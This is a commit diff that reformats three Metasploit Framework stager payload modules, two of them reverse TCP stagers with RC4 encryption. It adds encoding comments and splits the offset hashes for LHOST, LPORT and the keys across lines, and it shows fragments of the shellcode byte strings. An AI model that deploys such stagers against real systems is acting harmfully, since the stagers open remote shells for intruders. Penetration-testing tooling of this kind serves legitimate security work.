Break up long lines and add magic encoding comment
parent
b3c78f74d2
commit
6c980981db
|
@ -1,3 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -32,7 +33,12 @@ module Metasploit3
|
|||
'Stager' =>
|
||||
{
|
||||
'RequiresMidstager' => false,
|
||||
'Offsets' => { 'LPORT' => [ 200, 'n' ], 'XORKey' => [ 260, '' ], 'RC4Key' => [ 324, '' ] },
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 200, 'n' ],
|
||||
'XORKey' => [ 260, '' ],
|
||||
'RC4Key' => [ 324, '' ]
|
||||
},
|
||||
'Payload' =>
|
||||
# Length: 411 bytes
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -32,7 +33,14 @@ module Metasploit3
|
|||
'Stager' =>
|
||||
{
|
||||
'RequiresMidstager' => false,
|
||||
'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'], 'XORKey' => [ 252, '' ], 'RC4Key' => [ 316, '' ] },
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 197, 'ADDR' ],
|
||||
'LPORT' => [ 204, 'n' ],
|
||||
'ReverseConnectRetries' => [ 195, 'C'],
|
||||
'XORKey' => [ 252, '' ],
|
||||
'RC4Key' => [ 316, '' ],
|
||||
},
|
||||
'Payload' =>
|
||||
# Length: 403 bytes
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -32,7 +33,14 @@ module Metasploit3
|
|||
'Stager' =>
|
||||
{
|
||||
'RequiresMidstager' => false,
|
||||
'Offsets' => { 'HostName' => [ 248, '' ], 'LPORT' => [ 212, 'n' ], 'ReverseConnectRetries' => [ 207, 'C'], 'XORKey' => [ 329, '' ], 'RC4Key' => [ 393, '' ] },
|
||||
'Offsets' =>
|
||||
{
|
||||
'HostName' => [ 248, '' ],
|
||||
'LPORT' => [ 212, 'n' ],
|
||||
'ReverseConnectRetries' => [ 207, 'C'],
|
||||
'XORKey' => [ 329, '' ],
|
||||
'RC4Key' => [ 393, '' ]
|
||||
},
|
||||
'Payload' =>
|
||||
# Name: stager_reverse_tcp_rc4_dns
|
||||
# Length: 480 bytes
|
||||
|
|
Loading…
Reference in New Issue